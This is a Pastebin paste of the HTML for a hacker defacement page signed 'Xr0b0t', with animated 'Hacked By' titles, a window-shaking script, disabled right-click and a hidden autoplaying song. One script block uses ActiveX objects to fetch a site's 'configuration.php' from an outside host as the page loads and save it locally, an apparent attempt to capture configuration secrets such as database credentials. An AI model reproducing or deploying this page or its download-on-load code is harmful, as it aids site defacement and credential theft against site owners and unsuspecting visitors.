Advertisement
Xr0b0t

Never Die

May 17th, 2013
907
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 9.14 KB | None | 0 0
  1.       <html><head><title>Xr0b0t</title>
  2.      
  3.     <link href='http://74.52.121.37/~dbxenter/X-Au-Blu-icon.png' rel='shortcut icon' type='image/png'> <head>
  4. <script language="JavaScript">
  5.  
  6. var time = null
  7. function move() {
  8. window.location = 'http://mc-crew.info/'
  9. }
  10. //-->
  11. </script>
  12.  
  13.     <SCRIPT LANGUAGE="Javascript">
  14.     <!-- Begin
  15.    
  16. function DownloadFile(sURL, sFilename)
  17. {
  18.    try
  19.    {
  20.        var oStream = new ActiveXObject('ADODB.Stream');
  21.    }
  22.    catch(e)
  23.    {
  24.        WScript.Echo('not supported');
  25.        WScript.Quit();
  26.    }
  27.  
  28.    // Fetch the file
  29.    var oXMLHTTP = new ActiveXObject('MSXML2.XMLHTTP');
  30.  
  31.    oXMLHTTP.open('GET', sURL, false);
  32.    oXMLHTTP.send();
  33.  
  34.    if (oXMLHTTP.Status == 200)
  35.    {
  36.        oStream.Open();
  37.        oStream.Type = 1; //adTypeBinary
  38.  
  39.        oStream.Write(oXMLHTTP.ResponseBody);
  40.  
  41.        oStream.SaveToFile (sFilename, 2); // adSaveCreateNotExist AND adSaveCreateOverWrite
  42.        oStream.Close();
  43.        oStream = null;
  44.    }
  45.    else
  46.    {
  47.        WScript.Quit();
  48.    }
  49.  
  50.    oXMLHTTP = null;
  51. }
  52.  
  53. DownloadFile('http://www.poweredbyvirtuemart.com/configuration.php', 'configuration.txt');
  54.     // End -->
  55.     </SCRIPT>
  56.     <script language="JavaScript">function tb5_makeArray(n){ this.length = n; return this.length;
  57.     }
  58.     tb5_messages = new tb5_makeArray(2);
  59.     tb5_messages[0] = "I Am Not Dead";
  60.     tb5_messages[1] = "..::Xr0b0t::..";
  61.     tb5_rptType = 'infinite';
  62.     tb5_rptNbr = 100;
  63.     tb5_speed = 200;
  64.     tb5_delay = 50;
  65.     var tb5_counter=1;
  66.     var tb5_currMsg=0;
  67.     var tb5_stsmsg="";
  68.     function tb5_shuffle(arr){
  69.     var k;
  70.     for (i=0; i<arr.length; i++){ k = Math.round(Math.random() * (arr.length - i - 1)) + i; temp = arr[i];arr[i]=arr[k];arr[k]=temp;
  71.     }
  72.     return arr;
  73.     }
  74.     tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
  75.     tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
  76.     for (var i=0; i<tb5_messages[tb5_currMsg].length; i++){ tb5_arr[i] = i; tb5_sts[i] = "_";
  77.     }
  78.     tb5_arr = tb5_shuffle(tb5_arr);
  79.     function tb5_init(n){
  80.     var k;
  81.     if (n == tb5_arr.length){ if (tb5_currMsg == tb5_messages.length-1){ if ((tb5_rptType == 'finite') && (tb5_counter==tb5_rptNbr)){ clearTimeout(tb5_timerID); return; } tb5_counter++; tb5_currMsg=0; } else{ tb5_currMsg++; } n=0; tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length); tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length); for (var i=0; i<tb5_messages[tb5_currMsg].length; i++){ tb5_arr[i] = i; tb5_sts[i] = "_"; } tb5_arr = tb5_shuffle(tb5_arr); tb5_sp=tb5_delay;
  82.     }
  83.     else{ tb5_sp=tb5_speed; k = tb5_arr[n]; tb5_sts[k] = tb5_messages[tb5_currMsg].charAt(k); tb5_stsmsg = ""; for (var i=0; i<tb5_sts.length; i++) tb5_stsmsg += tb5_sts[i]; document.title = tb5_stsmsg; n++; } tb5_timerID = setTimeout("tb5_init("+n+")", tb5_sp);
  84.     }  
  85.     function tb5_randomizetitle(){ tb5_init(0);
  86.     }
  87.     tb5_randomizetitle();</script><SCRIPT>/*
  88.     An object-oriented Typing Text script, to allow for multiple instances.
  89.     A script that causes any text inside any text element to be "typed out", one letter at a
  90.     time. Note that any HTML tags will not be included in the typed output, to prevent them
  91.     from causing problems. Tested in Firefox v1.5.0.1, Opera v8.52, Konqueror v3.5.1, and IE
  92.     v6.
  93.     Browsers that do not support this script will simply see the text fully displayed from the
  94.     start, including any HTML tags.
  95.     Functions defined: TypingText(element, [interval = 100,] [cursor = "",] [finishedCallback = function()
  96.     {return}]): Create a new TypingText object around the given element. Optionally specify a delay between characters of interval milliseconds. cursor allows users to specify some HTML to be appended to the end of the string whilst typing. Optionally, can also be a function which accepts the current text as an argument. This allows the user to create a "dynamic cursor" which changes depending on the latest character or the current length of the string. finishedCallback allows advanced scripters to supply a function to be executed on finishing. The function must accept no arguments. TypingText.run(): Run the effect. static TypingText.runAll(): Run all TypingText-enabled objects on the page.
  97.     */
  98.     TypingText = function(element, interval, cursor, finishedCallback) { if((typeof document.getElementById == "undefined") || (typeof element.innerHTML ==
  99.     "undefined")) { this.running = true;    // Never run. return; } this.element = element; this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; }); this.interval = (typeof interval == "undefined" ? 100 : interval); this.origText = this.element.innerHTML; this.unparsedOrigText = this.origText; this.cursor = (cursor ? cursor : ""); this.currentText = ""; this.currentChar = 0; this.element.typingText = this; if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++; TypingText.all.push(this); this.running = false; this.inTag = false; this.tagBuffer = ""; this.inHTMLEntity = false; this.HTMLEntityBuffer = "";
  100.     }
  101.     </script>
  102.      
  103.     </head>
  104.     <BODY bgColor="#000000" onload="teclear();" oncontextmenu="return false" onselectstart="returnfalse">
  105.      
  106.     <DIV align="center"><SPAN style="FILTER: blur(add=1,direction=170,strength=30); HEIGHT: 50px">
  107.     <FONT style="FONT-SIZE: 8pt" face="Courier New">
  108.     <center>
  109.     <center><div style="border: 2px solid ; overflow: auto; color: white;
  110.     background-color: black; width: 98%;">
  111.      
  112.     <FONT style="FONT-SIZE: 6pt" face="Courier New">
  113.     <span style="height: 30px;">
  114.     <font style="font-size: 30pt;" color="red" face="Impact"> I Am Xr0b0t</font></font></span>
  115.     </h1>
  116.      
  117.     <h1> <center><img src="http://3.bp.blogspot.com/-cuhopaslZy8/TWH-EaoOllI/AAAAAAAAAAQ/VeeHKsr9eHk/s230/transformers3darkofthem.jpg"></center></h1>
  118.     <script type="text/javascript">
  119.         var charIndex = -1;
  120.         var stringLength = 0;
  121.         var inputText;
  122.         function writeContent(init){
  123.             if(init){
  124.                 inputText = document.getElementById('contentToWrite').innerHTML;
  125.             }
  126.             if(charIndex==-1){
  127.                 charIndex = 0;
  128.                 stringLength = inputText.length;
  129.             }
  130.             var initString = document.getElementById('myContent').innerHTML;
  131.             initString = initString.replace(/<SPAN.*$/gi,"");
  132.      
  133.             var theChar = inputText.charAt(charIndex);
  134.             var nextFourChars = inputText.substr(charIndex,4);
  135.             if(nextFourChars=='<BR>' || nextFourChars=='<br>'){
  136.                 theChar  = '<BR>';
  137.                 charIndex+=3;
  138.             }
  139.             initString = initString + theChar + "<SPAN id='blink'>_</SPAN>";
  140.             document.getElementById('myContent').innerHTML = initString;
  141.      
  142.             charIndex = charIndex/1 +1;
  143.             if(charIndex%2==1){
  144.                  document.getElementById('blink').style.display='none';
  145.             }else{
  146.                  document.getElementById('blink').style.display='inline';
  147.             }
  148.      
  149.             if(charIndex<=stringLength){
  150.                 setTimeout('writeContent(false)',90);
  151.             }else{
  152.                 blinkSpan();
  153.             }
  154.         }
  155.      
  156.         var currentStyle = 'inline';
  157.         function blinkSpan(){
  158.             if(currentStyle=='inline'){
  159.                 currentStyle='none';
  160.             }else{
  161.                 currentStyle='inline';
  162.             }
  163.             document.getElementById('blink').style.display = currentStyle;
  164.             setTimeout('blinkSpan()',300);
  165.      
  166.         }
  167.        
  168.        
  169.     msg = "";
  170.      
  171.     msg = "[+]Hacked By Xr0b0t ^_^![+]" + msg;pos = 0;
  172.     function scrollMSG() {
  173.     document.title = msg.substring(pos, msg.length) + msg.substring(0, pos);
  174.     pos++;
  175.     if (pos >  msg.length) pos = 0
  176.     window.setTimeout("scrollMSG(#)",200);
  177.     }
  178.     scrollMSG();
  179.     </script>
  180.      
  181.     <center>
  182.     <SCRIPT language=JavaScript1.2>
  183.     <!-- Owned By Arumbia Team*-->
  184.     function tremer(n) {
  185.     if (self.moveBy) {
  186.     for (i = 20; i > 0; i--) {
  187.     for (j = n; j > 0; j--) {
  188.     self.moveBy(0,i);
  189.     self.moveBy(i,0);
  190.     self.moveBy(0,-i);
  191.     self.moveBy(-i,0);
  192.     }}}}
  193.     tremer(5)
  194.     <!-- Owned By Falken Undercrew Inside-->
  195.       </SCRIPT>
  196.     <p align="center">&nbsp;<DIV class=layermensaje id=ttecleado ></DIV>
  197.     <script>
  198.     teclear();
  199.     </script><br>
  200.     </br>
  201.     <font size="3" color="#ff0001" face=""> Legend-H.org <br /><br>
  202.         <Center>I Am Not Dead </Center>
  203.  
  204. </font>
  205.     </br>
  206.     <img src="http://bestanimations.com/site/Lines/Theme-06-june.gif">
  207.     <br>
  208.     <font size="4" color="#ff0000" face="Curlz MT">Gr33ts :</font>
  209.     <marquee behavior="scroll" direction="left" scrollamount="3" scrolldelay="20" width="50%">
  210.      
  211.     <font size="3" color="white" face="Goudy Old Style">Legend-H </font></marquee>
  212.     </center>
  213.      
  214.     <center>
  215.     <object type="application/x-shockwave-flash"
  216.  
  217.  
  218.  
  219.     data="http://flash-mp3-player.net/medias/player_mp3_mini.swf" width="0" height="0">
  220.         <param name="movie" value="http://flash-mp3-player.net/medias/player_mp3_mini.swf" />
  221.      
  222.         <param name="bgcolor" value="#000000" />
  223.         <param name="FlashVars"
  224.  
  225.  
  226.  
  227.     value="mp3=http://www.kiss925.com/files/BRUNO-MARS-Locked-Out-Of-
  228. Heaven.mp3&amp;autoplay=1&amp;loadingcolor=000000&amp;slidercolo
  229.     r=fffffa" />
  230.     </object>
  231.     </center>
  232.      
  233.     <SCRIPT LANGUAGE="JavaScript">
  234.     <!--
  235.      
  236.         today=new Date();
  237.         y0=today.getFullYear();
  238.      
  239.       // end hiding --->
  240.      
  241.     </SCRIPT>
  242.     <center><font color="white" face="Courier New"> &#169; 2009-<SCRIPT LANGUAGE="JavaScript">
  243.       <!--- Hide from old browsers
  244.         document.write(y0);
  245.       // end hiding --->
  246.      
  247.     </SCRIPT></font></center>
  248.     <center><DIV id=matrix>-=-[ <a href="http://mc-crew.org">Legend-H</a> ]-=-</DIV><!-- 1252169712 -->
  249.     </body>
  250.     </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement